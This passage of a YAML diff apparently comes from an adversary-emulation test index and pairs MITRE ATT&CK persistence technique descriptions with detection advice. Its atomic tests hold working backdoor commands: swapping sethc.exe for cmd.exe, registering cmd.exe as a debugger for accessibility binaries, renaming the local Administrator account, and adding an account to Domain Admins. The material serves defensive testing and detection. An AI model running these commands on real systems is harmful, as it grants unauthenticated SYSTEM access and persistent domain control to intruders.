https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html + description: Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' + URI for Fileless Persistence. Retrieved April 28, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Accessibility Features + description: |- + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. + + Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit) + + Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. + + For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014) + + Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse) + + * On-Screen Keyboard: C:\Windows\System32\osk.exe + * Magnifier: C:\Windows\System32\Magnify.exe + * Narrator: C:\Windows\System32\Narrator.exe + * Display Switcher: C:\Windows\System32\DisplaySwitch.exe + * App Switcher: C:\Windows\System32\AtBroker.exe + id: attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-05-13T20:37:30.048Z' + created: '2020-01-24T14:32:40.315Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - SYSTEM + x_mitre_permissions_required: + - Administrator + x_mitre_detection: Changes to accessibility utility binaries or binary paths + that do not correlate with known software, patch cycles, etc., are suspicious. + Command line invocation of tools capable of modifying the Registry for associated + keys are also suspicious. Utility arguments and the binaries themselves should + be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_contributors: + - Paul Speulstra, AECOM Global Security Operations Center + x_mitre_platforms: + - Windows + identifier: T1546.008 + atomic_tests: + - name: Attaches Command Prompt as a Debugger to a List of Target Processes + auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 + description: | + Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. + + Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. + supported_platforms: + - windows + input_arguments: + parent_list: + description: 'Comma separated list of system binaries to which you want + to attach each #{attached_process}. Default: "osk.exe" + +' + type: String + default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, + atbroker.exe + attached_process: + description: 'Full path to process to attach to target in #{parent_list}. + Default: cmd.exe + +' + type: Path + default: C:\windows\system32\cmd.exe + executor: + command: | + $input_table = "#{parent_list}".split(",") + $Name = "Debugger" + $Value = "#{attached_process}" + Foreach ($item in $input_table){ + $item = $item.trim() + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + } + cleanup_command: | + $input_table = "#{parent_list}".split(",") + Foreach ($item in $input_table) + { + $item = $item.trim() + reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null + } + name: powershell + elevation_required: true + - name: Replace binary of sticky keys + auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 + description: 'Replace sticky keys binary (sethc.exe) with cmd.exe + +' + supported_platforms: + - windows + executor: + command: | + copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe + takeown /F C:\Windows\System32\sethc.exe /A + icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t + copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe + cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe + +' + name: command_prompt + elevation_required: true + T1098: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1098 + url: https://attack.mitre.org/techniques/T1098 + - source_name: Microsoft User Modified Event + description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account + was changed. Retrieved June 30, 2017.' + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738 + - description: Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. + Retrieved November 4, 2019. + url: https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670 + source_name: Microsoft Security Event 4670 + - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM + description: Warren, J. (2017, July 11). Manipulating User Passwords with + Mimikatz. Retrieved December 4, 2017. + source_name: InsiderThreat ChangeNTLM July 2017 + - url: https://github.com/gentilkiwi/mimikatz/issues/92 + description: 'Warren, J. (2017, June 22). lsadump::changentlm and lsadump::setntlm + work, but generate Windows events #92. Retrieved December 4, 2017.' + source_name: GitHub Mimikatz Issue 92 June 2017 + description: Adversaries may manipulate accounts to maintain access to victim + systems. Account manipulation may consist of any action that preserves adversary + access to a compromised account, such as modifying credentials or permission + groups. These actions could also include account activity designed to subvert + security policies, such as performing iterative password updates to bypass + password duration policies and preserve the life of compromised credentials. + In order to create or manipulate accounts, the adversary must already have + sufficient permissions on systems or the domain. + name: Account Manipulation + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T16:21:28.502Z' + created: '2017-05-31T21:31:12.196Z' + x_mitre_is_subtechnique: false + x_mitre_version: '2.2' + x_mitre_contributors: + - Jannie Li, Microsoft Threat Intelligence Center (MSTIC) + - Praetorian + - Tim MalcomVetter + x_mitre_data_sources: + - 'File: File Modification' + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Group: Group Modification' + - 'User Account: User Account Modification' + - 'Active Directory: Active Directory Object Modification' + x_mitre_detection: |- + Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017) + + Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity. + + Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts. + x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - IaaS + - Linux + - macOS + - Google Workspace + identifier: T1098 + atomic_tests: + - name: Admin Account Manipulate + auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af + description: 'Manipulate Admin Account Name + +' + supported_platforms: + - windows + executor: + command: | + $x = Get-Random -Minimum 2 -Maximum 9999 + $y = Get-Random -Minimum 2 -Maximum 9999 + $z = Get-Random -Minimum 2 -Maximum 9999 + $w = Get-Random -Minimum 2 -Maximum 9999 + Write-Host HaHa_$x$y$z + + $fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name + + foreach($member in $fmm) { + if($member -like "*Administrator*") { + $account = $member.Name -replace ".+\\\","" # strip computername\ + $originalDescription = (Get-LocalUser -Name $account).Description + Set-LocalUser -Name $account -Description "atr:$account;$originalDescription".Substring(0,48) # Keep original name in description + Rename-LocalUser -Name $account -NewName "HaHa_$x$y$z" # Required due to length limitation + Write-Host "Successfully Renamed $account Account on " $Env:COMPUTERNAME + } + } + cleanup_command: | + $list = Get-LocalUser |?{$_.Description -like "atr:*"} + foreach($u in $list) { + $u.Description -match "atr:(?[^;]+);(?.*)" + Set-LocalUser -Name $u.Name -Description $Matches.Description + Rename-LocalUser -Name $u.Name -NewName $Matches.Name + Write-Host "Successfully Reverted Account $($u.Name) to $($Matches.Name) on " $Env:COMPUTERNAME + } + name: powershell + elevation_required: true + - name: Domain Account and Group Manipulate + auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 + description: "Create a random atr-nnnnnnnn account and add it to a domain group + (by default, Domain Admins). \n\nThe quickest way to run it is against a domain + controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,\nyou need + to install PS Module ActiveDirectory (in prereqs) and run the script with + appropriare AD privileges to \ncreate the user and alter the group. Automatic + installation of the dependency requires an elevated session, \nand is unlikely + to work with Powershell Core (untested).\n\nIf you consider running this test + against a production Active Directory, the good practise is to create a dedicated\nservice + account whose delegation is given onto a dedicated OU for user creation and + deletion, as well as delegated\nas group manager of the target group.\n\nExample: + `Invoke-AtomicTest -Session $session 'T1098' -TestNames \"Domain Account and + Group Manipulate\" -InputArgs @{\"group\" = \"DNSAdmins\" }`\n" + supported_platforms: + - windows + input_arguments: + account_prefix: + description: | + Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on + a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. + type: String + default: atr- + group: + description: Name of the group to alter + type: String + default: Domain Admins + create_args: + description: Additional string appended to New-ADUser call + type: String + default: '' + dependencies: + - description: 'PS Module ActiveDirectory + +' + prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop + | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" + get_prereq_command: | + if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online + } else { + Install-WindowsFeature RSAT-AD-PowerShell + } + executor: + command: | + $x = Get-Random -Minimum 2 -Maximum 99 + $y = Get-Random -Minimum 2 -Maximum 99 + $z = Get-Random -Minimum 2 -Maximum 99 + $w = Get-Random -Minimum 2 -Maximum 99 + + Import-Module ActiveDirectory + $account = "#{account_prefix}-$x$y$z" + New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args} + Add-ADGroupMember "#{group}" $account + cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" + | Remove-ADUser -Confirm:$False + +' + name: powershell + T1547.014: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.014 + url: https://attack.mitre.org/techniques/T1547/014 + - source_name: Klein Active Setup 2010 + url: https://helgeklein.com/blog/2010/04/active-setup-explained/ + description: Klein, H. (2010, April 22). Active Setup Explained. Retrieved + December 18, 2020. + - source_name: Mandiant Glyer APT 2010 + url: https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf + description: Glyer, C. (2010). Examples of Recent APT Persitence Mechanism. + Retrieved December 18, 2020. + - source_name: Citizenlab Packrat 2015 + url: https://citizenlab.ca/2015/12/packrat-report/ + description: Scott-Railton, J., et al. (2015, December 8). Packrat. Retrieved + December 18, 2020. + - source_name: FireEye CFR Watering Hole 2012 + url: https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html + description: Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. + Retrieved December 18, 2020. + - source_name: SECURELIST Bright Star 2015 + url: https://securelist.com/whos-really-spreading-through-the-bright-star/68978/ + description: Baumgartner, K., Guerrero-Saade, J. (2015, March 4). Who’s Really + Spreading through the Bright Star?. Retrieved December 18, 2020. + - source_name: paloalto Tropic Trooper 2016 + url: https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/ + description: Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese + Government and Fossil Fuel Provider With Poison Ivy. Retrieved December + 18, 2020. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Active Setup + description: |- + Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level. + + Adversaries may abuse Active Setup by creating a key under HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016) + + Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. + id: attack-pattern--22522668-ddf6-470b-a027-9d6866679f67 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-03-05T22:36:37.414Z' + created: '2020-12-18T16:33:13.098Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Monitor Registry key additions and/or modifications to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\. + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data. + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_contributors: + - Bencherchali Nasreddine, @nas_bench, ELIT Security Team (DSSD) + x_mitre_platforms: + - Windows + atomic_tests: [] + T1098.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1098.003 + url: https://attack.mitre.org/techniques/T1098/003 + - source_name: Microsoft Support O365 Add Another Admin, October 2019 + url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d + description: Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019. + - source_name: Microsoft O365 Admin Roles + url: https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide + description: Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et. + al.. (2019, October 8). About admin roles. Retrieved October 18, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Add Office 365 Global Administrator Role + description: "An adversary may add the Global Administrator role to an adversary-controlled + account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft + Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin + Roles) With sufficient permissions, a compromised account can gain almost + unlimited access to data and settings (including the ability to reset the + passwords of other admins) via the global admin role.(Citation: Microsoft + O365 Admin Roles) \n\nThis account modification may immediately follow [Create + Account](https://attack.mitre.org/techniques/T1136) or other malicious account + activity." + id: attack-pattern--2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-24T12:40:02.331Z' + created: '2020-01-19T16:59:45.362Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: 'Collect usage logs from cloud administrator accounts to + identify unusual activity in the assignment of roles to those accounts. Monitor + for accounts assigned to admin roles that go over a certain threshold of known + admins. ' + x_mitre_data_sources: + - 'User Account: User Account Modification' + x_mitre_contributors: + - Microsoft Threat Intelligence Center (MSTIC) + x_mitre_platforms: + - Office 365 + atomic_tests: [] + T1137.006: + technique: + external_references: + - source_name: mitre-attack + external_id: T1137.006 + url: https://attack.mitre.org/techniques/T1137/006 + - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460 + description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017. + source_name: Microsoft Office Add-ins + - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/ + description: Knowles, W. (2017, April 21). Add-In Opportunities for Office + Persistence. Retrieved July 3, 2017. + source_name: MRWLabs Office Persistence Add-ins + - source_name: FireEye Mail CDS 2018 + url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf + description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail! + Enterprise Email Compromise. Retrieved April 22, 2019. + - source_name: GlobalDotName Jun 2019 + url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique + description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName + - A Stealthy Office Persistence Technique. Retrieved August 26, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Add-ins + description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence + on a compromised system. Office add-ins can be used to add functionality to + Office programs. (Citation: Microsoft Office Add-ins) There are different + types of add-ins that can be used by the various Office products; including + Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object + Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools + for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office + Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\n\nAdd-ins can be used + to obtain persistence because they can be set to execute code when an Office + application starts. " + id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-26T17:34:02.877Z' + created: '2019-11-07T19:52:52.801Z' + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins) + + Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_platforms: + - Windows + - Office 365 + atomic_tests: [] + T1098.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1098.001 + url: https://attack.mitre.org/techniques/T1098/001 + - source_name: Microsoft SolarWinds Customer Guidance + url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ + description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State + Cyber Attacks. Retrieved December 17, 2020. + - source_name: Blue Cloud of Death + url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1 + description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming + Azure. Retrieved October 23, 2019.' + - source_name: Blue Cloud of Death Video + url: https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815 + description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming + Azure. Retrieved November 21, 2019.' + - source_name: Demystifying Azure AD Service Principals + url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/ + description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service + Principals. Retrieved January 19, 2020. + - source_name: GCP SSH Key Add + url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add + description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved + October 1, 2020. + - source_name: Expel IO Evil in AWS + url: https://expel.io/blog/finding-evil-in-aws/ + description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding + Evil in AWS. Retrieved June 25, 2020. + - source_name: Expel Behind the Scenes + url: https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/ + description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020, + July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved + October 1, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Additional Cloud Credentials + description: |- + Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. + + Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals) + + In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) + id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-03-08T10:33:01.582Z' + created: '2020-01-19T16:10:15.008Z' + x_mitre_contributors: + - Expel + - Oleg Kolesnikov, Securonix + - Jannie Li, Microsoft Threat Intelligence Center (MSTIC) + x_mitre_version: '2.2' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account. + + Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity. + x_mitre_data_sources: + - 'User Account: User Account Modification' + - 'Active Directory: Active Directory Object Modification' + x_mitre_platforms: + - IaaS + - Azure AD + atomic_tests: [] + T1546.009: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.009 + url: https://attack.mitre.org/techniques/T1546/009 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + - url: https://forum.sysinternals.com/appcertdlls_topic12546.html + description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. + Retrieved December 18, 2017. + source_name: Sysinternals AppCertDlls Oct 2007 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: AppCert DLLs + description: "Adversaries may establish persistence and/or elevate privileges + by executing malicious content triggered by AppCert DLLs loaded into processes. + Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs + Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session + Manager\\ are loaded into every process that calls the ubiquitously + used application programming interface (API) functions CreateProcess, + CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, + or WinExec. (Citation: Elastic Process Injection July 2017)\n\nSimilar + to [Process Injection](https://attack.mitre.org/techniques/T1055), this value + can be abused to obtain elevated privileges by causing a malicious DLL to + be loaded and run in the context of separate processes on the computer. Malicious + AppCert DLLs may also provide persistence by continuously being triggered + by API activity. " + id: attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-11-10T18:29:31.052Z' + created: '2020-01-24T14:47:41.795Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - Administrator + - SYSTEM + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: "Monitor DLL loads by processes, specifically looking for + DLLs that are not recognized or not normally loaded into a process. Monitor + the AppCertDLLs Registry value for modifications that do not correlate with + known software, patch cycles, etc. Monitor and analyze application programming + interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx + and RegSetValueEx. (Citation: Elastic Process Injection July 2017) \n\nTools + such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting + location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls + Oct 2007)\n\nLook for abnormal process behavior that may be due to a process + loading a malicious DLL. Data and events should not be viewed in isolation, + but as part of a chain of behavior that could lead to other activities, such + as making network connections for Command and Control, learning details about + the environment through Discovery, and conducting Lateral Movement." + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + x_mitre_platforms: + - Windows + atomic_tests: [] + T1546.010: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.010 + url: https://attack.mitre.org/techniques/T1546/010 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - url: https://support.microsoft.com/en-us/kb/197571 + description: Microsoft. (2006, October). Working with the AppInit_DLLs registry + value. Retrieved July 15, 2015. + source_name: AppInit Registry + - url: https://msdn.microsoft.com/en-us/library/dn280412 + description: Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July + 15, 2015. + source_name: AppInit Secure Boot + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: AppInit DLLs + description: "Adversaries may establish persistence and/or elevate privileges + by executing malicious content triggered by AppInit DLLs loaded into processes. + Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs + value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows + NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows + NT\\CurrentVersion\\Windows are loaded by user32.dll into every process + that loads user32.dll. In practice this is nearly every program, since user32.dll + is a very common library. (Citation: Elastic Process Injection July 2017)\n\nSimilar + to Process Injection, these values can be abused to obtain elevated privileges + by causing a malicious DLL to be loaded and run in the context of separate + processes on the computer. (Citation: AppInit Registry) Malicious AppInit + DLLs may also provide persistence by continuously being triggered by API activity. + \n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions + when secure boot is enabled. (Citation: AppInit Secure Boot)" + id: attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-11-10T18:29:31.076Z' + created: '2020-01-24T14:52:25.589Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_system_requirements: + - Secure boot disabled on systems running Windows 8 and later 